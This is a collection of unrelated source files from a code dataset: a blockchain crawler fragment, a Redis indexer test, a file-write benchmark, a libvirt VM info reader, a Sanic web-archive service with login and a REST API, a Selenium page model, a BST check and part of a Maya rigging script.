New Auditor\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"data: \",c['call_args'][1]['value'])\n impactactions_newauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy auditor\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_auditor':\n print(\"Impact Actions - Destroy Auditor\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new proxy account\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_proxy':\n print(\"Impact Actions - Create New Proxy\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"account: \",c['call_args'][1]['value'])\n impactactions_newproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy proxy\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_proxy':\n print(\"Impact Actions - Destroy Proxy\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroyproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # new category\n if c['call_module']== 'ImpactActions' and c['call_function']=='create_category':\n print(\"Impact Actions - Create New Category\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"description: \",c['call_args'][1]['value'])\n impactactions_newcategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n # destroy category\n if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_category':\n print(\"Impact Actions - Destroy Category\")\n print(\"id: \",c['call_args'][0]['value'])\n impactactions_destroycategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])\n # Force Create Asset\n if c['call_module']== 'Assets' and c['call_function']=='force_create':\n print(\"Fungibile Tokens - Create Asset\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Owner: \",c['call_args'][1]['value'])\n print(\"Max Zombies: \",c['call_args'][2]['value'])\n print(\"Minimum Deposit: \",c['call_args'][3]['value'])\n assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])\n # Force transfer Assets\n if c['call_module']== 'Assets' and c['call_function']=='force_transfer':\n print(\"Fungible Tokens - Force Transfer\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Witnesses Zombies: \",c['call_args'][1]['value'])\n assets_forcetransfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,c['call_args'][1]['value'],currentime,c['call_args'][0]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])\n # Force Destroy Asset\n if c['call_module']== 'Assets' and c['call_function']=='force_destroy':\n print(\"Fungible Tokens - Create Asset\")\n print(\"id: \",c['call_args'][0]['value'])\n print(\"Witnesses Zombies: \",c['call_args'][1]['value'])\n assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])\n \n # Loop through call params\n for param in extrinsic.params:\n if 
param['type'] == 'Compact':\n                param['value'] = '{} {}'.format(param['value'] / 10 ** substrate.token_decimals, substrate.token_symbol)\n            print(\"Param '{}': {}\".format(param['name'], param['value']))\n        cnt=cnt+1\n\n# subscription handler for new blocks written\ndef subscription_handler(obj, update_nr, subscription_id):\n    print(f\"New block #{obj['header']['number']} produced by {obj['author']} hash: {obj['header']['hash']}\")\n    # call the block management function\n    process_block(obj['header']['number'])\n    \n## MAIN \n\n# load custom data types\ncustom_type_registry = load_type_registry_file(\"../assets/types.json\")\n# define connection parameters\nsubstrate = SubstrateInterface(\n    url=NODE,\n    ss58_format=42,\n    type_registry_preset='default',\n    type_registry=custom_type_registry\n\n)\n# create database tables\ncreate_tables()\n# synchronise the blockchain\nif(len(sys.argv)>1):\n    if (sys.argv[1]== '--sync' or sys.argv[1]==\"-s\"):\n        sync_blockchain(substrate)\n# subscribe to new block writing and process them in real time\nresult = substrate.subscribe_block_headers(subscription_handler, include_author=True)\nprint(result)\n\n\n","sub_path":"cache-engine/bitg-blockchain-crawler.py","file_name":"bitg-blockchain-crawler.py","file_ext":"py","file_size_in_byte":49445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"369568738","text":"import unittest\nimport redis\n\nfrom functions.bit_indexer import BitIndexer, BitDocument\nfrom functions.tokenizer import TermCountTokenizer\n\n\nclass TestBitIndexer(unittest.TestCase):\n    \"\"\"Integration test validating BitIndexer functionality. Requires \n    local redis server, specifically at: localhost:6379\n    \"\"\"\n    rdb = redis.Redis(host='localhost', port=6379, decode_responses=True)\n    tokenizer = TermCountTokenizer()\n    bit_indexer = BitIndexer(tokenizer=tokenizer, redisdb=rdb)\n\n    def setUp(self) -> None:\n        # clear redis before each test\n        self.rdb.flushall()\n\n    def _create_bit_document(self, id, title, content, tags):\n        return BitDocument(dict(\n            id={'stringValue': id},\n            title={'stringValue': title},\n            content={'stringValue': content},\n            tags={'arrayValue': {'values': [{'stringValue': tag} for tag in tags]}}\n        ))\n\n    def test_should_add_bit_to_index(self):\n        assert self.rdb.keys('*') == []\n        bit_doc = self._create_bit_document(\n            id='bit1', \n            title='What is redis', \n            content='Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker.',\n            tags=['redis', 'database', 'cache'])\n        \n        self.bit_indexer.add(bit_doc)\n        tokens = self.tokenizer.tokenize(bit_doc.as_indexable_str())\n        terms = self.rdb.keys('_*')\n        for term in terms:\n            assert str(term[1:]) in tokens\n        \n    def test_should_add_multiple_bits_to_index_with_correct_count(self):\n        bit_doc1 = self._create_bit_document(\n            id='bit1', \n            title='What is redis', \n            content='Redis is an open source in-memory data structure store',\n            tags=['redis', 'database', 'cache'])\n        bit_doc2 = self._create_bit_document(\n            id='bit2',\n            title='Continue, what is redis',\n            content=', used as a database, cache, and message broker.',\n            tags=['nosql', 'redis'])\n        bit_doc3 = self._create_bit_document(\n            id='bit3',\n            title='what is redis, part 3',\n            content='Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams',\n            tags=['datastructures', 'hashes', 'redis', 'nosql']\n        )\n\n        assert self.rdb.keys('*') == []\n\n        
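# index all three documents; judging by the assertions below, term counts are\n        # stored as negative zset scores so an ascending zrange lists the most\n        # frequent documents first\n        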
self.bit_indexer.add(bit_doc1)\n        self.bit_indexer.add(bit_doc2)\n        self.bit_indexer.add(bit_doc3)\n\n        # Each bit doc should have the term \"redis\" \n        terms = self.rdb.zrange('_redis', 0, 10, withscores=True)\n        for term_cnt in [('bit1', -3), ('bit3', -3), ('bit2', -2)]:\n            assert term_cnt in terms\n\n        # bit3 is only bit with term datastructures\n        assert ('bit3', -1) in self.rdb.zrange('_datastructures', 0, 10, withscores=True)\n\n    def test_should_delete_a_bit_from_index(self):\n        bit_doc = self._create_bit_document(\n            id='bit1', \n            title='What is redis', \n            content='Redis is an open source in-memory data structure store',\n            tags=['redis', 'database', 'cache'])\n\n        self.bit_indexer.add(bit_doc)\n        assert self.rdb.keys('*') != []\n        self.bit_indexer.delete(bit_doc)\n        assert self.rdb.keys('*') == []\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/functions/test_bit_indexer.py","file_name":"test_bit_indexer.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"73433289","text":"# -*- coding:utf-8 -*-\nfrom multiprocessing import Process, Pool\nimport os\nimport time\n\nfList = []\nnum_worker_threads = 10\n\n# On a MacBook Air, the average write speed with 5 files is about 14 MB/s,\n# and with 10 files it also averages about 14 MB/s\n\ndef run_proc(processId):\n    for i in range(10000000):\n        fList[processId].write(str(i) + \"\\n\")\n\nfor i in range(num_worker_threads):\n    f = open(os.path.join(\"res\", str(i)), 'w+')\n    fList.append(f)\n\nfor i in range(num_worker_threads):\n    p = Process(target=run_proc, args=(i,))\n    p.start()","sub_path":"basic/languages/python-19910220/lib-ref/11-file-dir-access/write_file4.py","file_name":"write_file4.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"350800556","text":"import libvirt\nimport xml.etree.ElementTree as ET\n\ndef get_vm_hostnames():\n    ns = {'url': 'http://openstack.org/xmlns/libvirt/nova/1.0'}\n    conn = libvirt.open('qemu:///system')\n    if conn == None:\n        print('Failed to open connection to qemu:///system')\n        exit(1)\n    index = 0\n    vms = {}\n    for i in conn.listAllDomains():\n        vms[index] = {}\n        raw_xml = i.XMLDesc(0)\n        root = ET.fromstring(raw_xml)\n        for child in root.findall('metadata'):\n            for c in child.findall('url:instance', ns):\n                for cc in c:\n                    if cc.tag == '{%s}name' % ns['url']:\n                        vms[index]['hostname'] = cc.text\n                    if cc.tag == '{%s}creationTime' % ns['url']:\n                        vms[index]['creationTime'] = cc.text\n                    if cc.tag == '{%s}flavor' % ns['url']:\n                        vms[index]['flavor'] = cc.attrib['name']\n                    if cc.tag == '{%s}owner' % ns['url']:\n                        vms[index]['owner'] = cc.find('url:user', ns).text\n                    if cc.tag == '{%s}owner' % ns['url']:\n                        vms[index]['project'] = cc.find('url:project', ns).text\n        index = index + 1\n    output = ''\n    for v in vms:\n        output = output + \"instance_%s.hostname=%s \" % (v, vms[v]['hostname'])\n        output = output + \"instance_%s.creationTime=%s \" % (v, '-'.join(\n            vms[v]['creationTime'].split()))\n        output = output + \"instance_%s.flavor=%s \" % (v, vms[v]['flavor'])\n        output = output + \"instance_%s.owner=%s \" % (v, vms[v]['owner'])\n        output = output + \"instance_%s.project=%s \" % (v, vms[v]['project'])\n    return output\n","sub_path":"modules/libvirt/retrieve-vm-info.py","file_name":"retrieve-vm-info.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"53406204","text":"import os, re\nfrom datetime import datetime\nimport argparse\nfrom functools import 
wraps\nimport base64\n\nfrom sanic import Sanic\nfrom sanic import response\nfrom sanic_auth import Auth, User\nfrom sanic_token_auth import SanicTokenAuth\nfrom tinydb import TinyDB, Query\n\nfrom schema import ArchivePostSchema\nfrom name_generator import ArchiveName\nfrom lemmiwinks_top import ArchiveServiceLemmiwinks\nfrom utilities import Archives\n\n# Sanic init\napp = Sanic()\n\n# Sanic-auth\napp.config.AUTH_LOGIN_ENDPOINT = 'login'\nauth = Auth(app)\n\nsession = {}\n@app.middleware('request')\nasync def add_session(request):\n request['session'] = session\n\ndb = TinyDB('db/login_access')\n\n# API auth\ndef api_auth_required():\n def decorator(f):\n @wraps(f)\n async def privileged(request, *args, **kwargs):\n # Authorization Basic\n if request.token == None:\n # no auth header\n return response.json(None, 401)\n\n try:\n print(request.token)\n _, auth_token = request.token.split(' ')\n decoded = base64.b64decode(auth_token).decode(\"utf-8\")\n username, password = decoded.split(\":\")\n except Exception:\n # bad token\n return response.json(None, 401)\n\n q = Query()\n result = next(iter(\n db.search((q.username == username) & (q.password == password))\n ), None)\n if result:\n # the user is authorized.\n return await f(request, *args, **kwargs)\n else:\n # incorrect user\n return response.json(None, 401)\n return privileged\n return decorator\n\n# Sanic routes\n@app.route('/', methods=['GET'])\nasync def get_index(request):\n \"\"\"get_index\n\n Main page containing basic information and navigation.\n\n :rtype: str\n \"\"\"\n with open(\"www/index.html\", \"r\", encoding='utf-8') as f:\n index = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n if auth.current_user(request):\n with open(\"www/index_user.html\", \"r\", encoding='utf-8') as f:\n index_user = f.read()\n return response.html(index.format(style, index_user))\n else:\n # show login to guest\n with open(\"www/index_guest.html\", \"r\", encoding='utf-8') as f:\n index_guest = f.read()\n return response.html(index.format(style, index_guest))\n\n\n@app.route('/login', methods=['GET'])\nasync def login(request):\n \"\"\"Login HTML page\n\n Login page with login form.\n \"\"\"\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n if auth.current_user(request):\n return response.redirect('/')\n else:\n with open(\"www/login.html\", \"r\", encoding='utf-8') as f:\n login = f.read()\n return response.html(login.format(style, ''))\n\n@app.route('/login', methods=['POST'])\nasync def login(request):\n \"\"\"Authenticate a user\n\n Checks and authenticates a user and saves into session. 
\n Redirects to the main page on corrent login,\n else displays error message.\n \"\"\"\n\n username = request.form.get('username')\n password = request.form.get('password')\n\n with open(\"www/login.html\", \"r\", encoding='utf-8') as f:\n login = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n q = Query()\n result = next(iter(\n db.search((q.username == username) & (q.password == password))\n ), None)\n if result:\n user = User(id=result.get('id'),name=username)\n auth.login_user(request, user)\n return response.redirect('/')\n else:\n msg_bad_login = 'Incorrect username or password'\n return response.html(login.format(style, msg_bad_login))\n\n@app.route('/logout', methods=['GET'])\n@auth.login_required\nasync def logout(request):\n \"\"\"Logout current user\n\n Logout user in this session and redirect to main page.\n \"\"\"\n\n auth.logout_user(request)\n return response.redirect('/')\n\n@app.route('/archives', methods=['GET'])\n@auth.login_required\nasync def get_archives(request):\n \"\"\"Archives collection.\n\n Gets HTML page with a list of all archives and a POST form for creating\n a new archive from given URL and options.\n\n :rtype: str\n \"\"\"\n\n with open(\"www/archives.html\", \"r\", encoding='utf-8') as f:\n html = f.read()\n with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n style = f.read()\n\n msg = ''\n html_archive_list = ''\n archives = Archives()\n for detail in archives.details():\n html_archive_list += '
<tr><td><a href=\"{}\">{}</a></td><td>{}</td><td>{}</td><td>{}</td></tr>'.format(\n            detail['href_detail'], detail['name'], detail['aid'], detail['ctime'], detail['size']\n        )\n\n    return response.html(html.format(style, html_archive_list, msg))\n\n@app.route('/archives', methods=['POST'])\n@auth.login_required\nasync def post_archives(request):\n    \"\"\"Posts form data for a new archive creation\n\n    A new archive will be created from given URLs. The view will\n    be updated with a status message.\n\n    :rtype: str\n    \"\"\"\n    print(request.form.get('forceTor'))\n    if request.form.get('forceTor'):\n        _forceTor = True\n    else:\n        _forceTor = False\n\n    archive_data = {\n        \"urls\" : [ request.form.get('url') ],\n        \"name\" : request.form.get('name'),\n        \"forceTor\" : _forceTor,\n        \"headers\" : {}\n    }\n    if ArchivePostSchema(archive_data).is_valid():\n        archive_name = ArchiveName(name=archive_data['name'], urls=archive_data['urls'])\n        if 'args' in globals():\n            aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n                archive_name=archive_name.full_name,\n                download_service_url=args.download_service_url)\n        else:\n            aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n                archive_name=archive_name.full_name,\n                download_service_url='http://0.0.0.0:8081')\n        await aio_archive.task_executor()\n        msg = 'Archive {} created.'.format(archive_name)\n        status = 201\n    else:\n        msg = 'Incorrect form request.'\n        status = 400\n\n    with open(\"www/archives.html\", \"r\", encoding='utf-8') as f:\n        html = f.read()\n    with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n        style = f.read()\n\n    html_archive_list = ''\n    archives = Archives()\n    for detail in archives.details():\n        html_archive_list += '<tr><td><a href=\"{}\">{}</a></td><td>{}</td><td>{}</td><td>{}</td></tr>'.format(\n            detail['href_detail'], detail['name'], detail['aid'], detail['ctime'], detail['size']\n        )\n\n    return response.html(html.format(style, html_archive_list, msg), status=status)\n\n\n@app.route('/archives/<id:int>', methods=['GET'])\n@auth.login_required\nasync def get_archive_item(request, id):\n    \"\"\"Archive item details\n\n    Gets HTML page with archive given by its ID. Contains file download link.\n\n    :param id: \n    :type id: int\n\n    :rtype: str\n    \"\"\"\n    with open(\"www/style.css\", \"r\", encoding='utf-8') as f:\n        style = f.read()\n    archives = Archives()\n    detail = archives.searchById(id)\n    if detail:\n        with open(\"www/archiveDetail.html\", \"r\", encoding='utf-8') as f:\n            html = f.read()\n        html = html.format(style, detail['name'], detail['file'], detail['aid'], detail['ctime'], detail['size'], detail['href_download'])\n        return response.html(html)\n    else:\n        with open(\"www/notfound.html\", \"r\", encoding='utf-8') as f:\n            html = f.read()\n        html = html.format(id)\n        return response.html(html, status=404)\n\n    \n@app.route('/archives/<id:int>/<filename>', methods=['GET'])\n@auth.login_required\nasync def get_archive_file(request, id, filename):\n    \"\"\"Downloads the archive\n\n    Downloads the archive given by its ID. \n\n    :param id: \n    :type id: int\n    :param filename: \n    :type filename: string\n\n    :rtype: str\n    \"\"\"\n\n    archives = Archives()\n    detail = archives.searchById(id)\n    if detail and detail['file'] == filename:\n        return await response.file_stream(filename, headers={\"Content-Type\" : \"application/x-maff\"})\n    else:\n        with open(\"www/notfound.html\", \"r\", encoding='utf-8') as f:\n            html = f.read() \n        return response.html(html.format(filename), status=404)\n\n\n# API routes\n\n@app.route('/api/archives', methods=['GET'])\n@api_auth_required()\nasync def api_get_archives(request):\n    \"\"\"Archives collection.\n\n    Gets JSON collection of all archives. 
Use query params.\n\n    :rtype: json\n    \"\"\"\n\n    archives = Archives()\n    # query string parse\n    try:\n        search_name = request.args['name'][0]\n    except KeyError:\n        search_name = ''\n    try:\n        skip = int(request.args['skip'][0])\n    except KeyError:\n        skip = 0\n    try:\n        limit = int(request.args['limit'][0])\n    except KeyError:\n        limit = 50\n\n    details = archives.searchByName(search_name)\n    details = details[skip:skip+limit]\n\n    return response.json(details)\n\n@app.route('/api/archives', methods=['POST'])\n@api_auth_required()\nasync def api_post_archives(request):\n    \"\"\"Posts data for new archive creation\n\n    A new archive will be created from given URLs. On success\n    the archive reference will be in the location response header.\n\n    :rtype: json\n    \"\"\"\n    if ArchivePostSchema(request.json).is_valid():\n        archive_data = {\n            \"urls\" : request.json.get('urls'),\n            \"name\" : request.json.get('name'),\n            \"forceTor\" : request.json.get('forceTor'),\n            \"headers\" : request.json.get('headers')\n        }\n        archive_name = ArchiveName(name=archive_data['name'], urls=archive_data['urls'])\n\n        if 'args' in globals():\n            aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n                archive_name=archive_name.full_name,\n                download_service_url=args.download_service_url)\n        else:\n            aio_archive = ArchiveServiceLemmiwinks(archive_data=archive_data, \n                archive_name=archive_name.full_name,\n                download_service_url='http://0.0.0.0:8081')\n\n        try:\n            await aio_archive.task_executor()\n        except Exception as e:\n            # something went wrong, archive not created\n            print(e)\n            return response.json(None, status=204)\n        else:\n            return response.json(None, status=201, headers={'Location': archive_name.href_detail_api})\n    else:\n        # bad request\n        return response.json(None, status=400)\n    \n@app.route('/api/archives/<id:int>', methods=['GET'])\n@api_auth_required()\nasync def api_get_archive_item(request, id):\n    \"\"\"Gets archive item details\n\n    Gets JSON representation of archive item given by id.\n\n    :param id: \n    :type id: int\n\n    :rtype: json\n    \"\"\"\n\n    archives = Archives()\n    detail = archives.searchById(id)\n    if detail:\n        return response.json(detail)\n    else:\n        return response.json(None, status=404)\n\n@app.route('/api/archives/<id:int>', methods=['DELETE'])\n@api_auth_required()\nasync def api_delete_archive_item(request, id):\n    \"\"\"Deletes the archive\n\n    Deletes the archive given by its ID. \n\n    :param id: \n    :type id: int\n\n    :rtype: json\n    \"\"\"\n\n    archives = Archives()\n    detail = archives.searchById(id)\n    if detail:\n        os.remove(detail['file'])\n        return response.json(None, status=204)\n    else:\n        # nothing to delete for an unknown id\n        return response.json(None, status=404)\n\n@app.route('/api/archives/<id:int>/<filename>', methods=['GET'])\n@api_auth_required()\nasync def api_get_archive_file(request, id, filename):\n    \"\"\"Downloads the archive\n\n    Downloads the archive file given by its ID and filename. 
\n\n :param id: \n :type id: int\n :param filename: \n :type filename: string\n\n :rtype: str\n \"\"\"\n\n archives = Archives()\n detail = archives.searchById(id)\n if detail and detail['file'] == filename:\n return await response.file_stream(filename, headers={\"Content-Type\" : \"application/x-maff\"})\n else:\n return response.json(None, status=404)\n\n\n# parse command line arguments and run Sanic server\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Start the archive service')\n parser.add_argument('--download_service_url', type=str, default='http://0.0.0.0:8081',\n help='Download service URL to be used by this service')\n args = parser.parse_args()\n\n app.run(host=\"0.0.0.0\", port=\"8080\")\n\n\n","sub_path":"archive_service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":12627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"641158709","text":"import time\n\n\nclass ASModel:\n as_sidebar = {'selector': 'div[class=\"as-buttons\"]', 'selector_type': 'css'}\n accounting_tab = {'selector': '//span[contains(text(),\"Accounting\")]', 'selector_type': 'xpath'}\n create_transaction_tab = {'selector': '//span[contains(text(),\"Create transaction\")]', 'selector_type': 'xpath'}\n transactions_tab = {'selector': '//span[contains(text(),\"Transactions\")]', 'selector_type': 'xpath'}\n reports_tab = {'selector': '//span[contains(text(),\"Reports\")]', 'selector_type': 'xpath'}\n burger_button = {'selector': 'button.menu-icon>span>i', 'selector_type': 'css'}\n accounting_table = {'selector': 'table.accounting--table', 'selector_type': 'css'}\n accounting_user_select = {'selector': 'input[id^=\"input\"]', 'selector_type': 'css'}\n general_input = {'selector': '[id^=\"input\"]', 'selector_type': 'css'}\n transaction_type = {'selector': '//div[@class=\"v-list-item__content\"]/div[text()=\"{}\"]', 'selector_type': 'xpath'}\n\n def __init__(self, webdriver):\n self.webdriver = webdriver\n\n def click_accounting_tab(self, button_name):\n for i in range(2):\n self.webdriver.move_to_element(**self.as_sidebar)\n self.webdriver.click_with_wait(**getattr(self, button_name))\n # time.sleep(5)\n\n # self.webdriver.click(**{'selector': 'i.mdi-view-split-horizontal', 'selector_type': 'css'})\n # self.webdriver.move_to_element(**self.burger_button)\n\n def get_create_transactions_inputs(self):\n inputs_names_list = [\n 'effective_date',\n 'transaction_type',\n 'affected_user',\n 'from_account',\n 'to_account',\n 'amount',\n 'currency',\n 'approver',\n 'comment',\n ]\n elements = self.webdriver.get_elements(**self.general_input)\n\n inputs_names_dict = {}\n for index, element in enumerate(elements):\n inputs_names_dict[inputs_names_list[index]] = element\n\n return inputs_names_dict\n\n def choose_transaction_type(self, transaction_type, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.click_with_wait(\n selector=self.transaction_type['selector'].format(transaction_type),\n selector_type=self.transaction_type['selector_type']\n )\n\n def write_data(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.input_text(text=text, element=element)\n\n def write_data_and_select(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.input_text(text=text, 
element=element)\n self.webdriver.click_with_wait(selector=f'//span[contains(text(),\"{text}\")]')\n\n def select_data(self, text, element):\n self.webdriver.click_with_wait(element=self.webdriver.get_element(selector='..', element=element))\n self.webdriver.click_with_wait(selector=f'//div[text()=\"{text}\"]')\n\n def multiple_select(self, managers, amount):\n qty_row = len(self.webdriver.get_elements(\n selector='form > div.ps.ps--active-y > div',\n selector_type='css')\n )\n for row_number in range(1, qty_row - 1):\n row = self.webdriver.get_element(\n selector=f'form > div.ps.ps--active-y > div:nth-child({row_number})',\n selector_type='css'\n )\n user_input = self.webdriver.get_element(selector=f'input[type=\"text\"]', selector_type='css', element=row)\n user = self.webdriver.get_atribute(element=user_input, attribute='value')\n if (managers[0] in user) or (managers[1] in user):\n amount_input = self.webdriver.get_element(selector=f'input[type=\"number\"]', selector_type='css', element=row)\n self.webdriver.input_text(text=amount, element=amount_input)\n","sub_path":"page_object_models/as_model.py","file_name":"as_model.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"114227816","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n return self.helper(root, float(\"-inf\"), float(\"inf\"))\n \n def helper(self, node, minimum, maximum):\n if node is None:\n return True\n \n if node.val <= minimum or node.val >= maximum:\n return False\n \n leftValid = self.helper(node.left, minimum, node.val)\n rightValid = self.helper(node.right, node.val, maximum)\n \n return leftValid and rightValid\n","sub_path":"bst/validate-bst.py","file_name":"validate-bst.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"488965559","text":"from __future__ import absolute_import\n\nimport maya.cmds as cmds\n\nfrom rigging.library.utils import controller as rlu_controller, transform as rlu_transform, core as rlu_core\nfrom rigging.tools import utils as rt_utils\n\n\nclass Build:\n def __init__(self, curve_template, scale, side_LFT, side_RGT, side, offset_jnt02_bind_position,\n offset_jnt04_bind_position,\n ctrl01_direction, ctrl02_direction, ctrl03_direction, ctrl04_direction, ctrl05_direction,\n ctrl_color, wire_low_controller, shape, position_joint_direction, face_utils_grp, suffix_controller,\n base_module_nonTransform, game_bind_joint, parent_sgame_joint,\n connect_with_corner_ctrl=False):\n\n # DUPLICATE CURVE THEN RENAME\n curve_new = rt_utils.obj_duplicate_then_rename(obj_duplicate=curve_template, suffix='crv')[1]\n curve = curve_new[0]\n cmds.parent(curve, base_module_nonTransform)\n\n self.prefix_name_crv = rlu_transform.reposition_side(rt_utils.prefix_name(curve), side_LFT=side_LFT,\n side_RGT=side_RGT)\n\n self.position_jnt_direction = cmds.xform(position_joint_direction, q=1, ws=1, t=1)[0]\n\n self.curve_vertex = cmds.ls('%s.cv[0:*]' % curve, fl=True)\n\n self.create_joint_wire(curve=curve, scale=scale, side=side, game_bind_joint=game_bind_joint,\n parent_sgame_joint=parent_sgame_joint)\n\n self.wire_bind_curve(offset_jnt02_bind_position=offset_jnt02_bind_position, ctrl01_direction=ctrl01_direction,\n ctrl02_direction=ctrl02_direction, 
offset_jnt04_bind_position=offset_jnt04_bind_position,\n ctrl03_direction=ctrl03_direction, ctrl04_direction=ctrl04_direction,\n ctrl05_direction=ctrl05_direction, curve=curve, scale=scale, side=side)\n\n self.controller_wire(scale=scale, side=side, controller_wire_low=wire_low_controller, shape=shape,\n ctrl_color=ctrl_color,\n connect_with_corner_ctrl=connect_with_corner_ctrl, side_RGT=side_RGT, side_LFT=side_LFT,\n suffix_controller=suffix_controller)\n\n self.grouping_wire(side=side, face_utils_grp=face_utils_grp, position_direction_jnt=position_joint_direction)\n\n self.curve = curve\n\n def grouping_wire(self, side, face_utils_grp, position_direction_jnt):\n setup_driver_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Setup' + side + '_grp')\n ctrl_driver_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Controller' + side + '_grp')\n\n cmds.hide(setup_driver_grp)\n all_grp = cmds.group(em=1, n=self.prefix_name_crv + side + '_grp')\n\n wire_driven_jnt_grp = cmds.group(em=1, n=self.prefix_name_crv + 'DrivenJnt' + side + '_grp')\n cmds.delete(cmds.parentConstraint(position_direction_jnt, wire_driven_jnt_grp))\n wire_driven_jnt_grp_offset = \\\n cmds.duplicate(wire_driven_jnt_grp, n=self.prefix_name_crv + 'DrivenOffsetJnt' + side + '_grp')[0]\n wire_driven_ctrl_grp = \\\n cmds.duplicate(wire_driven_jnt_grp, n=self.prefix_name_crv + 'DrivenCtrl' + side + '_grp')[0]\n wire_driven_ctrl_grp_offset = \\\n cmds.duplicate(wire_driven_ctrl_grp, n=self.prefix_name_crv + 'DrivenOffsetCtrl' + side + '_grp')[0]\n\n # parenting to joint grp\n cmds.parent(wire_driven_jnt_grp_offset, wire_driven_jnt_grp)\n cmds.parent(wire_driven_ctrl_grp_offset, wire_driven_ctrl_grp)\n\n cmds.parent(wire_driven_jnt_grp, setup_driver_grp, all_grp)\n cmds.parent(wire_driven_ctrl_grp, ctrl_driver_grp)\n\n cmds.parent(all_grp, face_utils_grp)\n\n self.wire_driven_jnt_grp_offset = wire_driven_jnt_grp_offset\n self.wire_driven_ctrl_grp = wire_driven_ctrl_grp\n self.wire_driven_ctrl_grp_offset = wire_driven_ctrl_grp_offset\n self.setup_driver_grp = setup_driver_grp\n self.ctrl_driver_grp = ctrl_driver_grp\n\n cmds.parent(self.drive_ctrl_grp, wire_driven_ctrl_grp_offset)\n cmds.parent(self.joint_grp, setup_driver_grp)\n cmds.parent(self.bind_jnt_grp, wire_driven_jnt_grp_offset)\n\n cmds.parent(self.curves_grp, self.locator_grp, self.setup_driver_grp)\n\n def controller_wire(self, scale, ctrl_color, shape, controller_wire_low, suffix_controller,\n side_RGT, side_LFT, side='', connect_with_corner_ctrl=False):\n\n # controller mid\n controller_bind03 = rlu_controller.Control(match_obj_first_position=self.jnt03,\n prefix=self.prefix_name_crv + 'Drv03',\n shape=shape, groups_ctrl=['Zro', 'Offset'], ctrl_size=scale * 0.075,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # controller rgt 01\n controller_bind05 = rlu_controller.Control(match_obj_first_position=self.jnt05,\n prefix=self.prefix_name_crv + 'Drv05',\n shape=shape, groups_ctrl=['Zro', 'Offset', 'All'],\n ctrl_size=scale * 0.035,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # controller rgt 02\n controller_bind04 = rlu_controller.Control(match_obj_first_position=self.jnt04,\n prefix=self.prefix_name_crv + 'Drv04',\n shape=shape, groups_ctrl=['Zro', 'Offset'], 